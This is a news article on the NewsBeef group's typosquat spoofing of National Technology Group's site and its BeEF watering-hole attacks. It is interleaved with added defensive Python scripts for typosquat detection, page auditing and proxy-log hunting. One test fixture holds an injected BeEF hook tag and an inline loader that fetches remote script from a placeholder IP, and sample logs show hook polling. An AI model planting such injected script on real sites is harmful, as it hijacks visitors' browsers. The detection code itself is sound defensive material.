India Insights with Geetha Nandikotkur


Hackers Targeted Saudi Arabia's National Technology Group
'NewsBeef' APT Group Spoofed Website in Attempt to Steal Critical Data

The website of Saudi-based National Technology Group, an IT services organization, was spoofed by a hacker group that attempts to steal credentials and gain access to critical corporate information, according to a report by CERT of Saudi Arabia.


The report, shared with Information Security Media Group by a security practitioner who requested anonymity, claims that on Jan. 23, an advanced persistent threat group known as "NewsBeef" spoofed the site using a typo-squatting domain (see: Researchers See Links Between Iran and Mac Malware).
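A typo-squatting domain works because a lookalike name is hard to tell from the real one at a glance. As an added example, not from the CERT report or from ISMG, the script below generates the usual squat variants of a brand domain (dropped, doubled, transposed and confusable characters, hyphen insertion, TLD swaps) and checks a list of observed domains against them, with an edit-distance catch-all for variants the generator does not enumerate. The domain `ntgroup.com`, the TLD list and the observed domains are all assumed placeholders, not NTG's real domain or real indicators.

```python
"""Typosquat detection: generate lookalike variants of a brand domain and
match them against observed domains (passive DNS, proxy logs, new-domain feeds).
Added example; the domain below is a placeholder, not NTG's real domain."""

LEGIT = "ntgroup.com"          # assumed placeholder for the legitimate site
TLDS = ["com", "net", "org", "co", "sa", "com.sa"]   # assumed TLDs to cover
# Confusable substitutions commonly seen in typosquat registrations.
CONFUSABLES = {"o": ["0"], "l": ["1", "i"], "i": ["l", "1"], "e": ["3"],
               "a": ["4"], "s": ["5"], "m": ["rn"], "rn": ["m"],
               "w": ["vv"], "g": ["q"]}


def typosquat_variants(domain):
    """Return a set of candidate squat domains derived from `domain`."""
    label, _, tld = domain.partition(".")
    labels = set()
    for i in range(len(label)):                       # omission / repetition
        labels.add(label[:i] + label[i + 1:])
        labels.add(label[:i] + label[i] * 2 + label[i + 1:])
    for i in range(len(label) - 1):                   # adjacent transposition
        labels.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    for i in range(1, len(label)):                    # hyphen insertion
        labels.add(label[:i] + "-" + label[i:])
    for src, repls in CONFUSABLES.items():            # confusable swaps
        idx = label.find(src)
        while idx != -1:
            for r in repls:
                labels.add(label[:idx] + r + label[idx + len(src):])
            idx = label.find(src, idx + 1)
    labels.discard(label)
    variants = {f"{lab}.{t}" for lab in labels for t in TLDS}
    variants |= {f"{label}.{t}" for t in TLDS if t != tld}   # TLD swap only
    return variants


def levenshtein(a, b):
    """Edit distance, used as a catch-all for variants not generated above."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def find_lookalikes(observed, legit=LEGIT, max_dist=2):
    """Classify each observed domain; returns [(domain, reason), ...]."""
    label = legit.split(".")[0]
    variants = typosquat_variants(legit)
    hits = []
    for d in observed:
        d = d.lower().rstrip(".")
        if d == legit:
            continue
        reg = d.split(".")[0]
        if d in variants:
            hits.append((d, "generated-variant"))
        elif label in reg:                 # brand embedded: support-ntgroup.com
            hits.append((d, "brand-embedded"))
        elif levenshtein(reg, label) <= max_dist:
            hits.append((d, f"edit-distance={levenshtein(reg, label)}"))
    return hits


# Constructed sample of observed domains (not real indicators).
OBSERVED = ["ntgroup.com", "ntgr0up.com", "ntgruop.com", "ntgroup.co",
            "support-ntgroup.com", "example.org", "ntqroup.net", "ntgrop.sa"]

if __name__ == "__main__":
    for domain, reason in find_lookalikes(OBSERVED):
        print(f"{domain:25} {reason}")
```

Run against a daily feed of newly registered domains or your own proxy logs; anything flagged is a candidate for a takedown request or a block rule, and the edit-distance catch-all keeps the short list of hand-written substitutions from being the only net.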


The NewsBeef group seems to have recently deployed a new toolset that includes malicious macro-enabled Office documents, the PowerShell-based post-exploitation suite PowerSploit and the Pupy backdoor, according to the report. These tools are used to penetrate network systems. NTG is just one of several websites NewsBeef has targeted, according to the CERT report.

Officials of CERT-SA and NTG did not respond to ISMG's requests for comment.

Phishing Campaign

The report states that the NewsBeef group primarily uses spear-phishing and watering hole attacks against high-profile targets.

Several security practitioners tell ISMG that NewsBeef has waged a complex, multiyear cyber espionage campaign that exploits social media and takes a low-tech approach to avoid security defenses. The goal of the campaign is to steer victims to spoofed or compromised websites to steal user credentials in an effort to access critical assets of an organization.

Qatar-based Edward Ayman Ganom, CISO at The Commercial Bank, notes that the attackers use the Browser Exploitation Framework, or BeEF, a penetration testing suite that focuses on vulnerabilities in the web browser.

These attacks usually lead to data loss and stolen credentials. The hacker group has been using BeEF to track visitors of websites it has compromised, including the NTG website, via flaws in content management systems, according to the CERT report.
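A BeEF watering hole is only as quiet as the script tag the attacker plants in the compromised page, so a site owner can catch it by auditing what their own pages load. As an added example (not code from the CERT report, NTG or ISMG), the check below parses a page, flags script tags served from any origin outside an allowlist, flags anything named like BeEF's default hook file, and looks inside inline scripts for a dynamic loader that pulls in an off-origin URL. The site host, the allowlist and the sample page are assumed placeholders; the IP addresses are RFC 5737 documentation addresses.

```python
"""Watering-hole check for a site's own pages: parse the HTML and flag script
tags that load from a non-allowlisted origin, plus anything named like the
BeEF hook. Added example; hosts below are placeholders."""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

SITE_HOST = "www.ntgroup.example"                          # assumed site host
ALLOWED_SCRIPT_HOSTS = {SITE_HOST, "cdn.ntgroup.example"}  # assumed allowlist
HOOK_NAMES = ("hook.js",)   # BeEF's default hook file; operators can rename it
URL_RE = re.compile(r"https?://[^\s'\"<>]+", re.I)
LOADER_RE = re.compile(r"createelement\(\s*['\"]script['\"]\s*\)", re.I)


class ScriptCollector(HTMLParser):
    """Collects external script src values and inline script bodies."""
    def __init__(self):
        super().__init__()
        self.srcs, self.inline, self._buf = [], [], None

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            src = dict(attrs).get("src")
            if src:
                self.srcs.append(src)
            else:
                self._buf = []          # start collecting an inline body

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._buf is not None:
            self.inline.append("".join(self._buf))
            self._buf = None

    def handle_data(self, data):
        if self._buf is not None:
            self._buf.append(data)


def audit_page(html, allowed=ALLOWED_SCRIPT_HOSTS):
    """Return [(finding, url), ...] for scripts a clean page should not carry."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.srcs:
        u = urlparse(src)          # handles //host/path and absolute URLs
        host = (u.hostname or "").lower()
        if u.path.lower().endswith(HOOK_NAMES):
            findings.append(("beef-hook-src", src))
        elif host and host not in allowed:
            findings.append(("off-origin-script", src))
    for code in p.inline:
        if LOADER_RE.search(code):     # dynamic loader: createElement('script')
            for url in URL_RE.findall(code):
                if (urlparse(url).hostname or "").lower() not in allowed:
                    findings.append(("inline-script-loader", url))
    return findings


# Constructed page: one injected hook tag and one inline loader.
# 198.51.100.7 and 203.0.113.9 are RFC 5737 documentation addresses.
PAGE = """<html><head>
<script src="/assets/app.js"></script>
<script src="https://cdn.ntgroup.example/lib.js"></script>
<script src="//198.51.100.7:3000/hook.js"></script>
<script>var s=document.createElement('script');
s.src='http://203.0.113.9/j.js';document.head.appendChild(s);</script>
</head><body><p>news</p></body></html>"""

if __name__ == "__main__":
    for kind, url in audit_page(PAGE):
        print(kind, url)
```

Run this over a crawl of your own site from outside the corporate network, since a compromised CMS can serve the injected tag only to some visitors; a Content-Security-Policy with a strict `script-src` allowlist is the runtime equivalent of the same check.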

Samir Pawaskar, a security professional with a leading policy and risk team, says that the NewsBeef attackers have monitored visitor profiles and deployed evercookies, a JavaScript-based technique for persistent tracking, to compromise identity, gain access to assets and steal personal information from website visitors.

The CERT report states that spear-phishing and watering hole attacks targeting an organization's employees and customers are highly effective and may lead to identity or credential theft and/or system compromise, giving the attacker access to the target machine as well as the organization's network.

Remediation Methods

The best way to mitigate the risk of such attacks is to educate teams about the dangers of spear-phishing, social engineering and visiting spoofed websites, security experts say.

CERT's report recommends strict adherence to UAE's information assurance standards. Key remediation methods should include:

  • Ensure all devices get the latest firmware and software updates.
  • Monitor network and host-based traffic for signs of anomalous or suspicious activity.
  • Investigate network/host traffic containing the indicators of compromise.
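The last two steps above are what a SOC actually runs: match indicators against traffic and look for the behaviour a hooked browser produces. As an added example (not from the CERT report or ISMG), the script below scans Squid-style proxy log lines for requests to IOC hosts or paths and for one client polling the same URL at regular intervals, which is how a browser hooked by BeEF keeps talking to its server. The IOC list, the `/poll` path, the hosts and the log lines are all constructed for the example; the addresses are RFC 5737 documentation ranges.

```python
"""Hunt for indicators in a Squid-style proxy log: requests to IOC hosts or
paths, and regular polling that looks like a hooked browser beaconing home.
Added example; IOCs, hosts and log lines are constructed."""
import re
from collections import defaultdict
from statistics import mean, pstdev
from urllib.parse import urlparse

IOC_HOSTS = {"ntgr0up.com", "198.51.100.7"}   # constructed, not the CERT's list
IOC_PATHS = ("/hook.js",)                     # BeEF default hook file name

# Squid native format: ts elapsed client action/code size method url ...
LOG_RE = re.compile(r"^(?P<ts>\d+\.\d+)\s+\d+\s+(?P<client>\S+)\s+\S+\s+\d+"
                    r"\s+(?P<method>\S+)\s+(?P<url>\S+)")


def scan(lines, min_polls=5, max_jitter=0.5):
    """Return (ioc_hits, beacons).

    ioc_hits: [(client, url)] for requests matching an IOC host or path.
    beacons:  [((client, host, path), count, mean_gap_s)] for client/URL pairs
              with >= min_polls requests whose inter-arrival times are regular
              (std dev <= max_jitter * mean)."""
    ioc_hits, series = [], defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue          # skip malformed or comment lines
        u = urlparse(m["url"])
        host = (u.hostname or "").lower()
        if host in IOC_HOSTS or u.path.lower().endswith(IOC_PATHS):
            ioc_hits.append((m["client"], m["url"]))
        series[(m["client"], host, u.path)].append(float(m["ts"]))
    beacons = []
    for key, ts in series.items():
        if len(ts) < min_polls:
            continue
        ts.sort()
        gaps = [b - a for a, b in zip(ts, ts[1:])]
        if pstdev(gaps) <= max_jitter * mean(gaps):
            beacons.append((key, len(ts), round(mean(gaps), 1)))
    return ioc_hits, beacons


# Constructed log: a victim (10.0.0.5) visits the watering hole, loads the
# hook, then polls every 2 s; a second host (10.0.0.9) visits a typosquat.
SAMPLE_LOG = """\
1485158400.000    12 10.0.0.5 TCP_MISS/200 2311 GET http://www.ntgroup.example/news.html - HIER_DIRECT/203.0.113.10 text/html
1485158401.000    40 10.0.0.5 TCP_MISS/200 9800 GET http://198.51.100.7:3000/hook.js - HIER_DIRECT/198.51.100.7 application/javascript
1485158402.000    10 10.0.0.5 TCP_MISS/200 120 POST http://198.51.100.7:3000/poll - HIER_DIRECT/198.51.100.7 text/plain
1485158404.000    11 10.0.0.5 TCP_MISS/200 120 POST http://198.51.100.7:3000/poll - HIER_DIRECT/198.51.100.7 text/plain
1485158403.500     9 10.0.0.9 TCP_MISS/200 3100 GET http://example.org/ - HIER_DIRECT/203.0.113.11 text/html
1485158406.000    10 10.0.0.5 TCP_MISS/200 120 POST http://198.51.100.7:3000/poll - HIER_DIRECT/198.51.100.7 text/plain
1485158408.000    12 10.0.0.5 TCP_MISS/200 120 POST http://198.51.100.7:3000/poll - HIER_DIRECT/198.51.100.7 text/plain
1485158410.000    10 10.0.0.5 TCP_MISS/200 120 POST http://198.51.100.7:3000/poll - HIER_DIRECT/198.51.100.7 text/plain
1485158420.000    30 10.0.0.9 TCP_MISS/200 4100 GET http://ntgr0up.com/login - HIER_DIRECT/203.0.113.12 text/html
# not a log line
"""

if __name__ == "__main__":
    hits, beacons = scan(SAMPLE_LOG.splitlines())
    for client, url in hits:
        print("IOC", client, url)
    for key, n, gap in beacons:
        print("BEACON", key, f"{n} requests every ~{gap}s")
```

The IOC match is only as good as the list it is given, which is the point of the threat-intelligence sharing the article closes on; the polling heuristic catches the same behaviour from a server nobody has listed yet, at the cost of false positives from legitimate pollers (chat widgets, dashboards), so tune `min_polls` and `max_jitter` against your own baseline.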

Security practitioners also stress the need to implement a multilayer defense-in-depth approach.

Pawaskar recommends that organizations check that they have adequate infrastructure in place to monitor their systems and respond when malicious traffic is detected.

Another way to mitigate attacks is to upgrade browsers more frequently and block social networks.

Ganom says training and awareness for senior executives about the risks of social engineering schemes is also important.

In addition, a key element in securing networks or websites is good threat intelligence sharing standards or practices. CERTs across the region need to encourage organizations to share information about new threats so companies can take appropriate mitigation steps.



About the Author

Geetha Nandikotkur


Managing Editor, Asia & the Middle East, ISMG

Nandikotkur is an award-winning journalist with over 20 years' experience in newspapers, audio-visual media, magazines and research. She has an understanding of technology and business journalism, and has moderated several roundtables and conferences, in addition to leading mentoring programs for the IT community. Prior to joining ISMG, Nandikotkur worked for 9.9 Media as a Group Editor for CIO & Leader, IT Next and CSO Forum.
